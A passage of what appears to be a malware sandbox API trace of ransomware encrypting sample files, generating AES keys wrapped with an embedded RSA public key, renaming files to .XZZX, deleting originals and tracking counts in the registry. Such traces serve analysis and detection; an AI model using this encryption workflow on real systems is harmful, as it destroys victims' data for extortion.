pcbStructInfo=0x4c5d3d8) returned 1 [0147.019] CryptAcquireContextW (in: phProv=0x4c5d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x4c5d3e4*=0x3cc0ff0) returned 1 [0147.020] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc0ff0, dwCertEncodingType=0x1, pInfo=0x437e1e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x437e218*, PublicKey.cbData=0x8c, PublicKey.pbData=0x437e220*, PublicKey.cUnusedBits=0x0), phKey=0x4c5d3ec | out: phKey=0x4c5d3ec*=0x4372178) returned 1 [0147.020] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0147.020] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0147.020] CryptEncrypt (in: hKey=0x4372178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x4c5d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x4c5d3f0*=0x80) returned 1 [0147.020] CryptEncrypt (in: hKey=0x4372178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc1188*, pdwDataLen=0x4c5d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc1188*, pdwDataLen=0x4c5d3e8*=0x80) returned 1 [0147.020] OutputDebugStringW (lpOutputString="Ȇ") [0147.021] WriteFile (in: hFile=0x8a8, lpBuffer=0x3cc1188*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4c5e42c, lpOverlapped=0x0 | out: lpBuffer=0x3cc1188*, lpNumberOfBytesWritten=0x4c5e42c*=0x80, lpOverlapped=0x0) returned 1 [0147.021] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0147.021] WriteFile (in: hFile=0x8a8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4c5e42c, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4c5e42c*=0x5, lpOverlapped=0x0) returned 1 [0147.021] CloseHandle (hObject=0x8a8) returned 1 [0147.021] VirtualFree (lpAddress=0x4f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.021] VirtualFree (lpAddress=0x4f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.021] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\37DA6C30402385B0E323002B44E969F8.XZZX" (normalized: "c:\\users\\public\\music\\sample music\\37da6c30402385b0e323002b44e969f8.xzzx"), dwFlags=0x1) returned 1 [0147.022] GetUserNameW (in: lpBuffer=0x4c5e1f8, pcbBuffer=0x4c5dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x4c5dfe0) returned 1 [0147.022] wsprintfW (in: param_1=0x4c5dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0147.022] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4c5dfe4 | out: phkResult=0x4c5dfe4*=0x8a8) returned 0x0 [0147.022] RegQueryValueExW (in: hKey=0x8a8, lpValueName="E1010314", lpReserved=0x0, lpType=0x4c5dfd8, lpData=0x4c5dfec, lpcbData=0x4c5dfdc*=0x4 | out: lpType=0x4c5dfd8*=0x4, lpData=0x4c5dfec*=0xdb, lpcbData=0x4c5dfdc*=0x4) returned 0x0 [0147.022] RegCloseKey (hKey=0x8a8) returned 0x0 [0147.022] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4c5dfe8 | out: phkResult=0x4c5dfe8*=0x8a8) returned 0x0 [0147.022] RegSetValueExW (in: hKey=0x8a8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x4c5dfec*=0xdc, cbData=0x4 | out: lpData=0x4c5dfec*=0xdc) returned 0x0 [0147.022] RegCloseKey (hKey=0x8a8) returned 0x0 Thread: id = 511 os_tid = 0xb5c [0143.136] lstrcpyA (in: lpString1=0x469fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0143.136] lstrcpyW (in: lpString1=0x469f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0143.136] lstrcpyW (in: lpString1=0x469e860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\" [0143.136] SetErrorMode (uMode=0x1) returned 0x1 [0143.136] lstrcpyW (in: lpString1=0x469f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0143.136] CoCreateGuid (in: pguid=0x469e440 | out: pguid=0x469e440*(Data1=0xf1249fc2, Data2=0x292c, Data3=0x4b51, Data4=([0]=0x95, [1]=0xb0, [2]=0x78, [3]=0xda, [4]=0x4b, [5]=0xda, [6]=0xd3, [7]=0x5))) returned 0x0 [0143.136] wsprintfW (in: param_1=0x469ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0143.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x469fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0143.136] wsprintfW (in: param_1=0x469e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\4FE187580C1CEAECF1249FC21086CF34.XZZX") returned 66 [0143.136] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0143.136] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x20) returned 1 [0143.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x870 [0143.136] ReadFile (in: hFile=0x870, lpBuffer=0x4362ca0, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0x469e418, lpOverlapped=0x0 | out: lpBuffer=0x4362ca0*, lpNumberOfBytesRead=0x469e418*=0x17c, lpOverlapped=0x0) returned 1 [0143.137] CloseHandle (hObject=0x870) returned 1 [0143.137] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x46a0000 [0143.137] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x46b0000 [0143.137] SetErrorMode (uMode=0x1) returned 0x1 [0143.137] lstrcpyW (in: lpString1=0x469e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0143.138] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4379480) returned 1 [0143.140] CryptGenKey (in: hProv=0x4379480, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d118d8) returned 1 [0143.580] CryptExportKey (in: hKey=0x3d118d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x469e41c | out: pbData=0x0*, pdwDataLen=0x469e41c*=0x94) returned 1 [0143.581] CryptExportKey (in: hKey=0x3d118d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x46b0000, pdwDataLen=0x469e41c | out: pbData=0x46b0000*, pdwDataLen=0x469e41c*=0x94) returned 1 [0143.581] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0143.581] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0143.581] CryptDestroyKey (hKey=0x3d118d8) returned 1 [0143.581] CryptReleaseContext (hProv=0x4379480, dwFlags=0x0) returned 0 [0143.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\4FE187580C1CEAECF1249FC21086CF34.XZZX" (normalized: "c:\\users\\public\\pictures\\4fe187580c1ceaecf1249fc21086cf34.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0143.687] WriteFile (in: hFile=0x884, lpBuffer=0x4362ca0*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x4362ca0*, lpNumberOfBytesWritten=0x469e438*=0x17c, lpOverlapped=0x0) returned 1 [0143.687] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17c [0143.687] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0143.687] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x181 [0143.687] WriteFile (in: hFile=0x884, lpBuffer=0x469f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x469f860*, lpNumberOfBytesWritten=0x469e438*=0x16, lpOverlapped=0x0) returned 1 [0143.688] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x197 [0143.688] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0143.688] SetFilePointer (in: hFile=0x884, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19c [0143.688] SetErrorMode (uMode=0x1) returned 0x1 [0143.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0143.688] OutputDebugStringW (lpOutputString="end") [0143.688] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õi\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x469dbf4, pcbBinary=0x469d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.688] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x469dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8 | out: pvStructInfo=0x469d3dc, pcbStructInfo=0x469d3d8) returned 1 [0143.688] CryptAcquireContextW (in: phProv=0x469d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x469d3e4*=0x43797b0) returned 1 [0143.689] CryptImportPublicKeyInfo (in: hCryptProv=0x43797b0, dwCertEncodingType=0x1, pInfo=0x3cf2a30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2a60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2a68*, PublicKey.cUnusedBits=0x0), phKey=0x469d3ec | out: phKey=0x469d3ec*=0x3d11a58) returned 1 [0143.689] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0143.689] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0143.689] CryptEncrypt (in: hKey=0x3d11a58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x469d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x469d3f0*=0x80) returned 1 [0143.689] CryptEncrypt (in: hKey=0x3d11a58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379838*, pdwDataLen=0x469d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379838*, pdwDataLen=0x469d3e8*=0x80) returned 1 [0143.689] WriteFile (in: hFile=0x884, lpBuffer=0x4379838*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x4379838*, lpNumberOfBytesWritten=0x469e438*=0x80, lpOverlapped=0x0) returned 1 [0143.689] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0143.690] WriteFile (in: hFile=0x884, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x469e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x469e438*=0x5, lpOverlapped=0x0) returned 1 [0143.690] GetUserNameW (in: lpBuffer=0x469e1f8, pcbBuffer=0x469dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x469dfe0) returned 1 [0143.690] wsprintfW (in: param_1=0x469dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0143.690] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe4 | out: phkResult=0x469dfe4*=0x8d0) returned 0x0 [0143.690] RegQueryValueExW (in: hKey=0x8d0, lpValueName="E1010314", lpReserved=0x0, lpType=0x469dfd8, lpData=0x469dfec, lpcbData=0x469dfdc*=0x4 | out: lpType=0x469dfd8*=0x4, lpData=0x469dfec*=0xcc, lpcbData=0x469dfdc*=0x4) returned 0x0 [0143.690] RegCloseKey (hKey=0x8d0) returned 0x0 [0143.690] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x469dfe8 | out: phkResult=0x469dfe8*=0x8d0) returned 0x0 [0143.690] RegSetValueExW (in: hKey=0x8d0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x469dfec*=0xcd, cbData=0x4 | out: lpData=0x469dfec*=0xcd) returned 0x0 [0143.690] RegCloseKey (hKey=0x8d0) returned 0x0 [0143.690] VirtualFree (lpAddress=0x46a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.691] VirtualFree (lpAddress=0x46b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.691] CloseHandle (hObject=0x884) returned 1 [0143.692] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0143.693] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0143.693] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 1 [0143.693] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0 Thread: id = 512 os_tid = 0xb60 [0143.575] lstrcpyA (in: lpString1=0x47ffc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0143.575] lstrcpyW (in: lpString1=0x47ff460, lpString2="Chrysanthemum.jpg" | out: lpString1="Chrysanthemum.jpg") returned="Chrysanthemum.jpg" [0143.575] lstrcpyW (in: lpString1=0x47fe860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0143.575] SetErrorMode (uMode=0x1) returned 0x1 [0143.575] lstrcpyW (in: lpString1=0x47ff860, lpString2="Chrysanthemum.jpg" | out: lpString1="Chrysanthemum.jpg") returned="Chrysanthemum.jpg" [0143.576] CoCreateGuid (in: pguid=0x47fe440 | out: pguid=0x47fe440*(Data1=0xf4b13467, Data2=0xcd82, Data3=0x4c56, Data4=([0]=0x90, [1]=0xb7, [2]=0x7f, [3]=0x56, [4]=0x22, [5]=0x44, [6]=0xb, [7]=0x2f))) returned 0x0 [0143.576] wsprintfW (in: param_1=0x47fec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0143.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x47ffee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0143.576] wsprintfW (in: param_1=0x47fe450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\28F3174E3D47A1ACF4B1346741C785F4.XZZX") returned 82 [0143.576] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch="XZZX") returned 0x0 [0143.576] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", dwFileAttributes=0x20) returned 1 [0143.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x884 [0143.640] ReadFile (in: hFile=0x884, lpBuffer=0x4110020, nNumberOfBytesToRead=0xd6b22, lpNumberOfBytesRead=0x47fe418, lpOverlapped=0x0 | out: lpBuffer=0x4110020*, lpNumberOfBytesRead=0x47fe418*=0xd6b22, lpOverlapped=0x0) returned 1 [0143.649] CloseHandle (hObject=0x884) returned 1 [0143.650] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0143.650] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0143.651] SetErrorMode (uMode=0x1) returned 0x1 [0143.651] lstrcpyW (in: lpString1=0x47fe358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0143.651] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4379728) returned 1 [0143.654] CryptGenKey (in: hProv=0x4379728, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d118d8) returned 1 [0144.096] CryptExportKey (in: hKey=0x3d118d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x47fe41c | out: pbData=0x0*, pdwDataLen=0x47fe41c*=0x94) returned 1 [0144.096] CryptExportKey (in: hKey=0x3d118d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x47fe41c | out: pbData=0x40a0000*, pdwDataLen=0x47fe41c*=0x94) returned 1 [0144.096] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.096] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0144.096] CryptDestroyKey (hKey=0x3d118d8) returned 1 [0144.096] CryptReleaseContext (hProv=0x43798c0, dwFlags=0x0) returned 0 [0144.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\28F3174E3D47A1ACF4B1346741C785F4.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\28f3174e3d47a1acf4b1346741c785f4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c8 [0144.101] WriteFile (in: hFile=0x8c8, lpBuffer=0x4110020*, nNumberOfBytesToWrite=0xd6b22, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x4110020*, lpNumberOfBytesWritten=0x47fe438*=0xd6b22, lpOverlapped=0x0) returned 1 [0144.109] SetFilePointer (in: hFile=0x8c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd6b22 [0144.109] WriteFile (in: hFile=0x8c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.109] SetFilePointer (in: hFile=0x8c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd6b27 [0144.109] WriteFile (in: hFile=0x8c8, lpBuffer=0x47ff860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x47ff860*, lpNumberOfBytesWritten=0x47fe438*=0x22, lpOverlapped=0x0) returned 1 [0144.110] SetFilePointer (in: hFile=0x8c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd6b49 [0144.110] WriteFile (in: hFile=0x8c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.110] SetFilePointer (in: hFile=0x8c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd6b4e [0144.110] SetErrorMode (uMode=0x1) returned 0x1 [0144.110] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0144.110] OutputDebugStringW (lpOutputString="end") [0144.110] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ\x7f\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x47fdbf4, pcbBinary=0x47fd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x47fdbf4, pcbBinary=0x47fd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.110] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x47fdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x47fd3dc, pcbStructInfo=0x47fd3d8 | out: pvStructInfo=0x47fd3dc, pcbStructInfo=0x47fd3d8) returned 1 [0144.110] CryptAcquireContextW (in: phProv=0x47fd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x47fd3e4*=0x4379948) returned 1 [0144.111] CryptImportPublicKeyInfo (in: hCryptProv=0x4379948, dwCertEncodingType=0x1, pInfo=0x3cf27c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf27f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf27f8*, PublicKey.cUnusedBits=0x0), phKey=0x47fd3ec | out: phKey=0x47fd3ec*=0x3d118d8) returned 1 [0144.111] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.111] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0144.111] 